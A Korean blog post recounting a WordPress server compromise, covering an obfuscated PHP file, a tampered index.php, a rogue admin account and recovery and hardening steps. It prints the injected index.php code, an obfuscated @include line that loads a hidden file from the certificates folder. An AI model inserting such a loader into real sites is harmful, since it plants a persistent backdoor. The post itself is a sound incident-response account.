웹서버를 운영하다가 의심스러운 활동이나 성능 저하와 같은 해킹 증상을 발견하면 빠른 대응이 필요합니다. 이 글에서는 실제 경험한 해킹 사례를 토대로 발견한 증상과 즉각 조치한 사항, 그리고 보안 조치 사항에 대해 자세히 살펴보겠습니다.
해킹 증상과 즉각조치 사항
웹서버 해킹의 증상은 다양하며, 이를 빨리 인식하는 것이 중요합니다. 주요 해킹 증상에는 다음과 같은 것들이 있습니다:
1. 의심스러운 파일 또는 디렉토리 생성
해킹 시도로 인해 웹서버에 의심스러운 파일 또는 디렉토리가 생성될 수 있습니다. 이런 파일들을 발견하면 즉시 조치가 필요합니다.
아래는 d8jbis9nw.php (1.6k)라는 이름 파일이 웹서버 root 디렉토리에서 발견되었습니다.
![[해킹사례] 알 수 없는 이름의 php파일](https://ljj.kr/wp-content/uploads/2023/10/2023-10-08-01-1.png)
보통 이런 파일은 난독화가 되어 있는 소스를 알아보기가 힘든것이 특징이고 파일명 또한 알수없는 이상한 이름입니다. 예를 들면 dltkdgks.php 처럼 말이죠. 아마 대부분이 중국쪽 소행이라고 본다면 중국어를 그대로 영타로 쳐서 만들어진 이름들이지 않을까 예상을 해봅니다. ㅎ
이러한 파일은 복호화를 진행해 보면 특정 주소와 통신을 하거나 변수명들을 수정하고 암호화 정보들을 얻거나 암호화전에 데이터를 얻는 형식입니다. 소스를 완전히 해독하기란 힘들기 때문에 남겨진 파일만으로 추적이나 기능을 정확히 판단하기는 힘듭니다.
다만 정상적인 프로그램은 저렇게 난독화 하는 소스는 없다는 것입니다. 파일명도 그렇구요.
조치 사항 :
해당 파일들을 모든 디렉토리를 뒤져서 삭제하였습니다. FTP에서 안지워지는 경우가 대부분이니 터미널로 접속하여 삭제해줬습니다.
2. 인덱스 파일 변경
원래의 인덱스 파일인 index.html이 index.html.bak으로 변경되어 있고 index.php로 인덱스가 파일이 연결되어 있습니다.
이는 FTP로 파일명을 직접 보기 전까지 알기가 힘듭니다. 그 이유는 index.php 파일에 악성코드 삽입되고 마지막에 기존 인덱스인 index.html.bak 파일을 include(불러오기)하고 있기 때문입니다.
워드프레스로 운영중인 본 블로그는 index파일이 워드프레스에 있는 index.php입니다. 그런데 이파일도 수정을 해놨더라구요.
아래는 index.php 이며 빨간색 부분이 수정된 코드입니다.
<?php
/*367e8*/
@include ("/home/****/*****/wp\x2d\x69ncludes/cert\x69f\x69cates/.cda49559.ot\x69");
/*367e8*/
/**
* Front to the WordPress application. This file doesn't do anything, but loads
* wp-blog-header.php which does and tells WordPress to load the theme.
*
* @package WordPress
*/
/**
* Tells WordPress to load the WordPress theme and output it.
*
* @var bool
*/
define( 'WP_USE_THEMES', true );
/** Loads the WordPress Environment and Template */
require __DIR__ . '/wp-blog-header.php';조치 사항 :
인덱스가 변경되어 있는 경우는 원본 파일로 교체하였고 기존 index파일에 소스가 추가된 부분은 삭제, 관련 연결된 파일도 찾아서 삭제 하였습니다. 여기서도 FTP권한이 해제되어 있어서 터미널로 파일을 삭제하고 원본의 깨끗한 파일을 재업로드 하였습니다.
3. 알 수 없는 관리자 계정
서버권한을 획득하였으니 웹페이지의 관리자계정 추가하거나 삭제하는 등은 식은죽 먹기 그 이상일겁니다.
제 워드프레스 계정에 알 수 없는 회원이 등록되어 있네요. 그것도 당당히 관리자 계정으로…!!
조치 사항 :
즉각 해당 사용자를 삭제 하였습니다.
4. 성능의 갑작스러운 저하
저는 사이트들이 가볍고 사용자가 많지 않아 특별히 느려진 현상이 없었지만 평시보다 웹페이지의 속도가 느려지거나 FTP의 파일권한이 갑작스럽게 변경된 경우는 해킹을 의심을 해보는 것이 좋습니다.
재발 방지를 위한 보안 조치 사항
개인 사이트같은 경우 해킹을 당해도 표시가 안나는 경우가 많습니다. 해커들도 돈이 되야 움직이기 때문이 아닐까 생각이 듭니다.
해킹으로 서버를 뚫은 경우가 돈이 안되는 사이트는 개인정보나 돈되는 무언가 걸리기 까지는 잠복하여 모니터링과 정보탈취를 하기때문이죠. 그래도 재발방지를 위해서는 웹서버 보안을 강화하기 위해 다음과 같은 조치가 필요합니다:
1. 웹서버 관련 모든 비번을 강력한 암호 정책으로 재설정
FTP, DB, 웹페이지 로그인 정보등의 비밀번호는 기존과 다르게 새롭게 재설정이 필요합니다.
이는 기존의 비번 정보에서 간단히 유추하지 못하는 강화된 비번이 좋겠습니다.
웹서버와 사용 중인 소프트웨어를 최신 버전으로 업데이트하여 보안 취약점을 최소화하세요.
2. 유비무한 자동 백업 시스템 구축
파일은 자주 업데이트 되지 않기 때문에 원본만 가지고 있어도 되지만 데이터베이스는 특정 주기 단위로 자동 백업 시스템을 구축하는게 좋습니다. 백업파일은 한개로 덮어 씌우기 보다는 매일 한개씩 추가 백업하는 방식으로 공간의 여유를 생각해서 오래된 파일이 지워지는 방식이 좋습니다. 워드프레스 사용자라면 간단히 플러그인으로 설정할 수 있습니다.
3. OS 최신 버전 및 업데이트
저의 경우 php버전이 7.4버전으로 오래된 버전입니다. 아마 PHP 취약점을 이용하여 권한을 취득하여 해킹에 성공한 것으로 보입니다. 특별히 급한것이 아니라는 판단으로 작업으로 미루고 있지만 머지 않아 최신 버전으로 업데이트 해야 할 것 같네요.
참 할일도 많은 일을 주네요. ㅠ_ㅠ
4. 백신 및 보안 프로그램 설치
윈도우에서 백신을 쓰듯이 리눅스 계열도 백신과 보안 프로그램들이 있습니다. 제 블로그에도 관련 포스팅이 있으니 참고해보세요.
결론
웹서버 해킹은 미리 대비하고 신속하게 대응하는 것이 중요합니다. 지속적인 모니터링과 보안 조치로 웹서버를 안전하게 유지하세요.
자주 묻는 질문 (FAQs)
해킹 증상을 놓치지 않고 어떻게 감지할 수 있을까요?
정기적인 로그 분석 및 보안 소프트웨어를 활용하여 의심스러운 활동을 신속히 탐지할 수 있습니다.
웹서버가 해킹당한 경우 스스로 대응하는 것이 가능한가요?
일부 간단한 대응은 가능하지만, 복잡한 공격에 대비하기 위해서는 보안 전문가의 도움이 필요합니다.
해킹으로부터 보호하기 위한 최고의 방법은 무엇인가요?
주기적인 보안 업데이트, 강력한 암호 정책, 웹 방화벽 도입 등이 효과적인 보안 조치입니다.
웹서버가 해킹당한 경우 어떤 데이터를 잃을 수 있을까요?
해커에게 의해 접근된 데이터는 노출될 가능성이 있으므로, 민감한 정보는 즉시 변경하고, 해당 사용자에게 알리세요.
해킹으로 인한 피해를 최소화하려면 어떤 대책을 취해야 하나요?
신속한 대응과 함께 사용자 교육을 통해 피해를 최소화할 수 있습니다. 정기적인 백업 또한 중요한 예방 수단입니다.